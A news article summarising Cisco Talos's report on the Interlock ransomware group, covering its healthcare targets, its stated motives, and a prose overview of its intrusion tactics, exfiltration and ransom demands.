Cisco Talos Incident Response reported that a new ransomware group has been targeting the healthcare sector and has been active since September 2024. Interlock ransomware is a threat group that claims to conduct attacks for financial gain and to show healthcare institutions their bad security practices. Based on the attacks during the first few months, Interlock targeted big companies with the financial capacity to pay large ransoms.
Interlock states that the threat group exposes organizations’ irresponsibility in failing to safeguard their most important assets: customer information and intellectual property. They take advantage of the vulnerabilities that organizations leave unsecured, sending a tough but needed wake-up call to people who skimp on security. Interlock stated on its data leaks blog site that they are not after the money only; they want responsibility. Information remains safe if people work hard to protect it. They want to impose the requirements like HIPAA compliance that organizations fail to maintain.
Cisco Talos IR team’s analysis of one Interlock ransomware attack revealed a number of the group’s tactics, techniques, and procedures (TTPs). Although the group states it uses vulnerabilities, it acquired preliminary access to the victim’s system by tricking a user into installing a phony Google Chrome browser upgrade through a breached legit news website. The executable file was downloaded from a legitimate vendor’s compromised website. The executable file transferred a remote access tool (RAT), which put a Windows shortcut file into the Windows StartUp folder to use the remote access tool every time the user signed in.
The RAT gathers data from the system, encrypts that data, creates a link to the Interlock command and control (C2) server, and transmits the encrypted information to the C2 server. The RAT additionally sent a credential sealer and keylogger and deactivated the endpoint detection & response (EDR) application and tried to remove the contents of event records to prevent discovery.
Interlock mainly utilizes remote desktop protocol combined with the breached information for lateral movement and likewise utilizes the remote access tools LogMeIn and AnyDesk for mobile connectivity. PuTTY was set up to permit lateral movement to Linux hosts. Information was sent to a distant Azure storage area utilizing AzCopy, then ransomware was used to encrypt files. Interlock spent 17 days from the preliminary compromise to file encryption and required a response to pay the ransom within 96 hours.
To date, victims included U.S. healthcare providers, technology institutions, and the government, with development companies assaulted in Europe. The stolen details are posted on the Interlock Worldwide Secrets weblog in case no ransom payment is given. The Cisco Talos team thinks that Interlock might be the Rhysida ransomware group’s breakaway because of overlapping TTPs. That statement is just the team’s assumption.
Image credits: Andrey Popov, AdobeStock
